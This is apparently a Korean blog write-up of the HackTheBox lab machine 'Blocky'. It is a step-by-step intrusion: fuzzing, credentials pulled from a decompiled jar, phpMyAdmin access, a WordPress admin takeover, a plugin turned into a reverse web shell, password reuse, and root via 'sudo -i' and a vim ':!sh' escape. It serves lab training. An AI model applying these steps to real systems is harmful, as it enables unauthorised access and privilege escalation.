OSCP/HackTheBox

[Linux] Blocky

우와해커 2020. 5. 23. 17:31

Blocky

 

gobuster로 URL 퍼징
10.10.10.37/plugins => jar파일 다운로드 => 리버싱
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

 

phpmyadmin 접근
10.10.10.37/phpmyadmin

워드프레스 유저 테이블로 접근하여 notch 관리자 패스워드 변경

 

10.10.10.37/wp-login.php

관리자 로그인하여 플러그인을 수정하여 리버스 웹쉘로 실행
http://10.10.10.37/wp-includes/themes/akismet/

 

웹서버 침투 후
터미널 SU 에러 발생: PHP를 통한 쉘에서 su하면 오류가 발생함

'su' command in Docker returns 'must be run from terminal'

 

해결법

/usr/bin/script -qc /bin/bash /dev/null

 

패스워드 재사용

로컬상의 notch 패스워드가 phpmyadmin과 동일함, 즉 ssh도 동일 비번으로 접근이 가능하다는 뜻
su notch
8YsqfCTnvxAUeduzjNSXe22

 

sudo -l 명령어 확인 => 모든 프로그램에 대하여 사용가능함

notch# sudo -l
User notch may run the following commands on Blocky:
(ALL : ALL) ALL

-i 옵션을 실해아여 권한 상승
sudo -i

vim으로 권한상승
sudo vim
:!sh
#> whoami

'OSCP > HackTheBox' 카테고리의 다른 글

[Linux] Mirai (포렌식)  (0) 2020.05.29
[Windows] Grandpa & Granny  (0) 2020.05.25
[Windows] Optimum  (0) 2020.05.21
[Linux] Beep  (0) 2020.05.19
[Windows] Devel  (0) 2020.05.19